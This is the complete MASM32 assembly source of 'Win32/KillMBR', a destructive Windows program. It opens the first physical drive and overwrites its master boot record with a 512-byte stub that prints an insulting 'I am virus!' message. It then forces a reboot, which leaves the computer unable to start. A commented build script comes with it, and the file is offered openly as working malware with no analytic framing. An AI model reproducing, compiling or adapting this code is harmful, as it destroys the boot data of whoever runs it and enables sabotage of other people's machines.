Win32/KillMBR

1. ; =========================================================================
2. ; -------------------------------------------------------------------------
3. ;     FILENAME : KillMBR.asm
4. ; -------------------------------------------------------------------------
5. ;       AUTHOR : Xylitol
6. ;        EMAIL : xylitol☆temari.fr
7. ; DATE CREATED : 18/07/2014
8. ;         TEST : Windows XP SP3
9. ;         SIZE : 3Kb - 21e3c553ef9ba6a2535a6fa159d81252
10. ;  DESCRIPTION : Overwrite the bootloader and reboot
11. ; -------------------------------------------------------------------------
12. ;                 This source is considered dangerous
13. ; -------------------------------------------------------------------------
14. ; =========================================================================
15.  
16. ; ---- make.bat -----------------------------------------------------------
17. ;@echo off
18. ;set path=\masm32\bin
19. ;set lib=\masm32\lib
20. ;set name=KillMBR
21. ;ml.exe /c /coff "%name%".asm
22. ;link.exe /SUBSYSTEM:WINDOWS /opt:nowin98 /LIBPATH:"%lib%" "%name%".obj
23. ;del *.OBJ
24. ;pause
25. ;@echo on
26. ;cls
27.  
28. ; ---- skeleton -----------------------------------------------------------
29. .386
30. .model flat, stdcall
31. option casemap :none   ; case sensitive
32.  
33. ; ---- Include ------------------------------------------------------------
34. include \masm32\include\windows.inc
35. include \masm32\include\user32.inc
36. include \masm32\include\kernel32.inc
37. include \masm32\include\ntdll.inc
38. include \masm32\include\shell32.inc
39. include \masm32\macros\macros.asm
40.  
41. includelib \masm32\lib\shell32.lib
42. includelib \masm32\lib\user32.lib
43. includelib \masm32\lib\kernel32.lib
44. includelib \masm32\lib\ntdll.lib
45.  
46. ; ---- Initialized data ---------------------------------------------------
47. .data
48. volume  db '\\.\PhysicalDrive0',0
49.  
50. ; New bootloader will print "I am virus! Fuck you :-)"
51. KillMBR     db  0B8h,12h,00h,0CDh,10h,0BDh,18h,7Ch,0B9h,18h,00h,0B8h,01h,13h,0BBh,0Ch
52.         db  00h,0BAh,1Dh,0Eh,0CDh,10h,0E2h,0FEh,49h,20h,61h,6Dh,20h,76h,69h,72h
53.         db  75h,73h,21h,20h,46h,75h,63h,6Bh,20h,79h,6Fh,75h,20h,3Ah,2Dh,29h
54.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
55.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
56.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
57.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
58.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
59.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
60.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
61.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
62.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
63.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
64.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
65.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
66.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
67.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
68.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
69.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
70.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
71.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
72.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
73.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
74.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
75.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
76.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
77.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
78.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
79.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
80.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
81.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
82.         db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,55h,0AAh
83.  
84. ; ---- Uninitialized data -------------------------------------------------
85. .data?
86. buffer      dd 512 dup (?)
87. bytesWritten    dd 512 dup (?)
88. hFile       dd ?
89.  
90. ; ---- Code ---------------------------------------------------------------
91. .code
92. start:
93.     invoke CreateFile,offset volume,GENERIC_READ+GENERIC_WRITE,FILE_SHARE_READ+FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0
94.         .if eax==0 ;If fail jump on ExitProcess
95.         .else
96.             mov hFile,eax
97.                 cld ;Trick to move the bootloader into the buffer with rep movsb
98.                 lea esi, KillMBR
99.                 lea edi, buffer
100.                 mov ecx, 512
101.                 rep movsb
102.             push eax
103.             mov eax,esp
104.     invoke WriteFile,hFile,addr buffer,512,addr bytesWritten,NULL ;write the new bootloader
105.         .if eax==0 ;If fail jump on ExitProcess
106.         .else
107.             invoke CloseHandle,hFile
108.             invoke RtlAdjustPrivilege,13h,1h,0h,esp ;Needed for reboot
109.             invoke ExitWindowsEx,2,10 ;Reboot the computer
110.         .endif
111.         .endif
112. finish:
113.     invoke ExitProcess,0
114. end start